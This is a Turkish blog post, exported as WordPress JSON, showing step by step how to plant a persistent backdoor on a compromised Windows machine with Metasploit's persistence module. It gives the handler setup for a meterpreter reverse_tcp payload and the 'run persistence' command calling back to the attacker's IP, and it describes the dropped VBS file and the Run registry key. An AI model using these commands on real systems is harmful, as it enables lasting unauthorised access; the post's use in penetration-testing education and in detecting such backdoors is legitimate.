{"id":1183,"date":"2015-10-05T14:41:15","date_gmt":"2015-10-05T11:41:15","guid":{"rendered":"https:\/\/furkansandal.com\/post-exploitation2-msf-persistence-post-modulu\/"},"modified":"2015-10-05T14:41:15","modified_gmt":"2015-10-05T11:41:15","slug":"post-exploitation2-msf-persistence-post-modulu","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/post-exploitation2-msf-persistence-post-modulu\/","title":{"rendered":"[Post Exploitation]#2 MSF Persistence Post Mod\u00fcl\u00fc"},"content":{"rendered":"<div id=\"post-body-752629397565625908\" itemprop=\"description articleBody\" readability=\"100.867594255\">\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/10\/silentbutdeadly.jpg?ssl=1\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" src=\"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/10\/silentbutdeadly.jpg?resize=200%2C200&#038;ssl=1\" height=\"200\" width=\"200\" data-recalc-dims=\"1\" \/><\/a><\/div>\n<p>\nBir sisteme girildikten bir s\u00fcre sonra bilgisayar ile ba\u011flant\u0131 kesilebilmektedir. Bu durumda o bilgisayar\u0131 tekrar exploit etmek gerekebilir. Bunun yerine bilgisayar arka kap\u0131 da b\u0131rak\u0131labilir. Bu yaz\u0131da, Metasploit Framework i\u00e7erisindeki <b>Persistence <\/b>mod\u00fcl\u00fc kullan\u0131larak arka kap\u0131 b\u0131rak\u0131lmas\u0131 incelenecektir.<\/p>\n<div style=\"text-align: justify;\" readability=\"8\">\nBir \u015fekilde (bu \u00f6rnek i\u00e7in MSF psexec mod\u00fcl\u00fc ile) Meterpreter kabu\u011funa d\u00fc\u015f\u00fclm\u00fc\u015f bir bilgisayar a\u015fa\u011f\u0131daki gibidir.<br \/><a name=\"more\"\/><\/div>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/2.bp.blogspot.com\/-3rCl5TDNBhE\/VAAuTp874-I\/AAAAAAAACaY\/PDyRIWo5Vw4\/s1600\/01.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"160\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045265_*\" width=\"640\"\/><\/a><\/div>\n<p>\nBu bilgisayarda Persistence post mod\u00fcl\u00fc \u00e7al\u0131\u015ft\u0131r\u0131lacak ve sald\u0131rgana ait Kali makinenin TCP 4567 portuna reverse bir meterpreter ba\u011flant\u0131 kurmas\u0131 sa\u011flanacakt\u0131r. Bu ba\u011flant\u0131n\u0131n Kali taraf\u0131ndan yakalanmas\u0131 i\u00e7in ayr\u0131 bir terminal a\u00e7\u0131larak <b>exploit\/multi\/handler<\/b> mod\u00fcl\u00fc ba\u015flat\u0131l\u0131r ve ayarlar\u0131 ger\u00e7ekle\u015ftirilir.<\/p>\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_55 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title \" >Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\" role=\"button\"><label for=\"item-663027e201964\" ><span class=\"\"><span style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input aria-label=\"Toggle\" aria-label=\"item-663027e201964\"  type=\"checkbox\" id=\"item-663027e201964\"><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><ul class='ez-toc-list-level-4'><li class='ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/furkansandal.com\/post-exploitation2-msf-persistence-post-modulu\/#_msfconsole_msf_%3E_use_exploitmultihandler_msf_exploithandler_%3E_set_PAYLOAD_windowsmeterpreterreverse_tcp_msf_exploithandler_%3E_set_ExitOnSession_false_msf_exploithandler_%3E_set_LHOST_1921680130_msf_exploithandler_%3E_set_LPORT_4567_msf_exploithandler_%3E_show_options\" title=\"\n# msfconsole # msf &gt; use exploit\/multi\/handler # msf exploit(handler) &gt; set PAYLOAD windows\/meterpreter\/reverse_tcp # msf exploit(handler) &gt; set ExitOnSession false # msf exploit(handler) &gt; set LHOST 192.168.0.130 # msf exploit(handler) &gt; set LPORT 4567 # msf exploit(handler) &gt; show options\">\n# msfconsole # msf &gt; use exploit\/multi\/handler # msf exploit(handler) &gt; set PAYLOAD windows\/meterpreter\/reverse_tcp # msf exploit(handler) &gt; set ExitOnSession false # msf exploit(handler) &gt; set LHOST 192.168.0.130 # msf exploit(handler) &gt; set LPORT 4567 # msf exploit(handler) &gt; show options<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/furkansandal.com\/post-exploitation2-msf-persistence-post-modulu\/#_msf_exploithandler_%3E_exploit_-j\" title=\"\n# msf exploit(handler) &gt; exploit -j\">\n# msf exploit(handler) &gt; exploit -j<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-4'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/furkansandal.com\/post-exploitation2-msf-persistence-post-modulu\/#meterpreter_%3E_run_persistence_-A_-X_-p_4567_-r_1921680130\" title=\"\nmeterpreter &gt; run persistence -A -X -p 4567 -r 192.168.0.130\">\nmeterpreter &gt; run persistence -A -X -p 4567 -r 192.168.0.130<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/furkansandal.com\/post-exploitation2-msf-persistence-post-modulu\/#Kaynak\" title=\"\nKaynak\">\nKaynak<\/a><\/li><\/ul><\/nav><\/div>\n<h4 style=\"text-align: justify;\"><span class=\"ez-toc-section\" id=\"_msfconsole_msf_%3E_use_exploitmultihandler_msf_exploithandler_%3E_set_PAYLOAD_windowsmeterpreterreverse_tcp_msf_exploithandler_%3E_set_ExitOnSession_false_msf_exploithandler_%3E_set_LHOST_1921680130_msf_exploithandler_%3E_set_LPORT_4567_msf_exploithandler_%3E_show_options\"><\/span>\n# msfconsole<br \/># msf &gt; use exploit\/multi\/handler<br \/># msf exploit(handler) &gt; set PAYLOAD windows\/meterpreter\/reverse_tcp<br \/># msf exploit(handler) &gt; set ExitOnSession false<br \/># msf exploit(handler) &gt; set LHOST 192.168.0.130<br \/># msf exploit(handler) &gt; set LPORT 4567<br \/># msf exploit(handler) &gt; show options<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/3.bp.blogspot.com\/-4vWDMamEfew\/VAAuTf8Xu4I\/AAAAAAAACbk\/EE4y3dcEGlk\/s1600\/02.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"450\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045265_*\" width=\"640\"\/><\/a><\/div>\n<p>\nDaha sonra da mod\u00fcl \u00e7al\u0131\u015ft\u0131r\u0131larak listener ba\u015flat\u0131l\u0131r.<\/p>\n<h4 style=\"text-align: justify;\"><span class=\"ez-toc-section\" id=\"_msf_exploithandler_%3E_exploit_-j\"><\/span>\n# msf exploit(handler) &gt; exploit -j<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/2.bp.blogspot.com\/-PmtKZqDjPZs\/VAAuTRmiGeI\/AAAAAAAACbg\/1nRnY-GBiWI\/s1600\/03.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"97\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045266_*\" width=\"400\"\/><\/a><\/div>\n<p>\nDaha \u00f6nce a\u00e7\u0131lan terminale (psexec mod\u00fcl\u00fc ile ilk exploit i\u015fleminin ba\u015flat\u0131ld\u0131\u011f\u0131 terminal) geri d\u00f6n\u00fclerek Persistence mod\u00fcl\u00fc \u00e7al\u0131\u015ft\u0131r\u0131l\u0131r. Bu mod\u00fcl ile Kali makinenin TCP 4567. portuna meterpreter ba\u011flant\u0131s\u0131 kurulmas\u0131 hedeflenmektedir.<\/p>\n<h4 style=\"text-align: justify;\"><span class=\"ez-toc-section\" id=\"meterpreter_%3E_run_persistence_-A_-X_-p_4567_-r_1921680130\"><\/span>\nmeterpreter &gt; run persistence -A -X -p 4567 -r 192.168.0.130<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/2.bp.blogspot.com\/-SJ1NYZgwewg\/VAAuUDFRP5I\/AAAAAAAACbY\/kdb1f6QH5Qs\/s1600\/04.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"151\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045267_*\" width=\"640\"\/><\/a><\/div>\n<blockquote class=\"tr_bq\" style=\"text-align: justify;\"><p>\n<span style=\"color: #990000;\"><b>Not:<\/b> Yukar\u0131daki mod\u00fcl \u00e7\u0131kt\u0131s\u0131nda da g\u00f6r\u00fcld\u00fc\u011f\u00fc gibi kurban makineye bir VBS (C:UsersTubitakAppDataLocalTempRVDJaFoFXmb.vbs) at\u0131lm\u0131\u015f ve \u00e7al\u0131\u015ft\u0131r\u0131lm\u0131\u015ft\u0131r. Ayr\u0131ca bir Autorun (HKLMSoftwareMicrosoftWindowsCurrentVersionRunazgEziBW) da y\u00fcklenmi\u015ftir.<\/span><\/p><\/blockquote>\n<p>\nBu mod\u00fcl y\u00fcklendi\u011finde, ikinci terminal \u00fczerinde a\u00e7\u0131k olan listener&#8217;a bir ba\u011flant\u0131 talebi geldi\u011fi ve hedef sisteme payload g\u00f6nderildi\u011fi (stage) g\u00f6r\u00fclmektedir. Bu payload ile de kurban makineye ba\u011flant\u0131 kurulmu\u015f olunur.<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/1.bp.blogspot.com\/-FQP5hdbBR8Q\/VAAuUdpZ7EI\/AAAAAAAACbU\/nEaNxlMgnRA\/s1600\/05.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"36\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045267_*\" width=\"640\"\/><\/a><\/div>\n<p>\n\u0130lk terminale geri d\u00f6n\u00fcl\u00fcp bilgisayar yeniden ba\u015flat\u0131ld\u0131\u011f\u0131nda ilk terminaldeki ba\u011flant\u0131 kopmaktad\u0131r:<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/2.bp.blogspot.com\/-tfQSeFGgi8w\/VAAuUlqxKZI\/AAAAAAAACbQ\/2ksCIkhnfLE\/s1600\/06.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"234\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045268_*\" width=\"640\"\/><\/a><\/div>\n<p>\nAyn\u0131 zamanda ikinci terminaldeki ba\u011flant\u0131 da kopmaktad\u0131r:<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/4.bp.blogspot.com\/-xP_GrzmODEs\/VAAuU_b5HmI\/AAAAAAAACaw\/EecwbNWlQi8\/s1600\/07.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"29\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045268_*\" width=\"640\"\/><\/a><\/div>\n<p>\nBilgisayar\u0131n yeniden ba\u015flamas\u0131 tamamland\u0131\u011f\u0131nda ve oturum a\u00e7\u0131ld\u0131\u011f\u0131nda, ikinci terminale yeniden bir talep gelmekte ve yeni bir stage g\u00f6nderilmektedir. B\u00f6ylece oturum a\u00e7an kullan\u0131c\u0131n\u0131n haklar\u0131yla tekrar bir oturum (Session 2) a\u00e7\u0131lmaktad\u0131r:<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/1.bp.blogspot.com\/-XnN3WBMu7dg\/VAAuVJgbLQI\/AAAAAAAACbM\/73ONnWNgNv8\/s1600\/08.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"241\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045268_*\" width=\"640\"\/><\/a><\/div>\n<p>\nMeterpreter ba\u011flant\u0131s\u0131n\u0131n prosesi incelendi\u011finde <b>svchost.exe<\/b> adl\u0131 bir proses oldu\u011fu g\u00f6r\u00fclmektedir. Ancak bu proses Windows&#8217;un standart prosesi olmad\u0131\u011f\u0131 da g\u00f6r\u00fclmektedir. Bu proses ise, VBS \u00e7al\u0131\u015ft\u0131ran bir Windows uygulamas\u0131 (&#8220;wscript.exe&#8221;) taraf\u0131ndan olu\u015fturulmu\u015ftur.<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/3.bp.blogspot.com\/-cA6mRLiXnlY\/VAAuVvWHntI\/AAAAAAAACbE\/QNe-ddtu0IM\/s1600\/09.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"145\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045272_*\" width=\"640\"\/><\/a><\/div>\n<p>\nBunun yan\u0131nda kullan\u0131c\u0131 bilgisayar\u0131 yeniden ba\u015flatmadan, oturumunu kapatt\u0131\u011f\u0131nda (log off) listener ba\u011flant\u0131s\u0131n\u0131n (Session 2) da koptu\u011fu g\u00f6r\u00fclmektedir.  Ancak yeniden oturum a\u00e7\u0131ld\u0131\u011f\u0131nda ba\u011flant\u0131n\u0131n yine olu\u015ftu\u011fu (Session 3) g\u00f6r\u00fclmektedir.<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/4.bp.blogspot.com\/-isGxO3nNYGQ\/VAAuVizZvRI\/AAAAAAAACbA\/FsngXkt9HCg\/s1600\/10.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"312\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045273_*\" width=\"640\"\/><\/a><\/div>\n<p>\nPersistence mod\u00fcl\u00fc ba\u015flat\u0131ld\u0131\u011f\u0131 zaman kurban bilgisayar\u0131na g\u00f6nderilen VBS (&#8230;RVDJaFoFXmb.vbs) ve Autorun (&#8230;azgEziBW) de\u011ferleri, kurban bilgisayar\u0131ndaki System Configuration (Run &gt; Msconfig) penceresi incelendi\u011finde g\u00f6r\u00fclmektedir.<\/p>\n<div class=\"separator\" style=\"clear: both; text-align: center;\">\n<a href=\"http:\/\/1.bp.blogspot.com\/-3k6HDvNCKVM\/VAAuWYDjs_I\/AAAAAAAACbI\/v_aWdhMXa-M\/s1600\/11.jpg\" style=\"margin-left: 1em; margin-right: 1em;\"><img loading=\"lazy\" decoding=\"async\" border=\"0\" height=\"425\" src=\"https:\/\/furkansandal.com\/wp-content\/uploads\/2015\/10\/1444045274_*\" width=\"640\"\/><\/a><\/div>\n<h3><span class=\"ez-toc-section\" id=\"Kaynak\"><\/span>\nKaynak<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<\/div>\n<p><a href=\"https:\/\/furkansandal.com\">Ana Sayfa <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Bir sisteme girildikten bir s\u00fcre sonra bilgisayar ile ba\u011flant\u0131 kesilebilmektedir. Bu durumda o bilgisayar\u0131 tekrar exploit etmek gerekebilir. Bunun yerine&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1184,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,3,7,4],"tags":[103,109,76,104,105,59,22,108,102,107,101,84,86,106],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/10\/silentbutdeadly.jpg?fit=400%2C400&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-j5","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/1183"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=1183"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/1183\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/1184"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=1183"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=1183"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=1183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}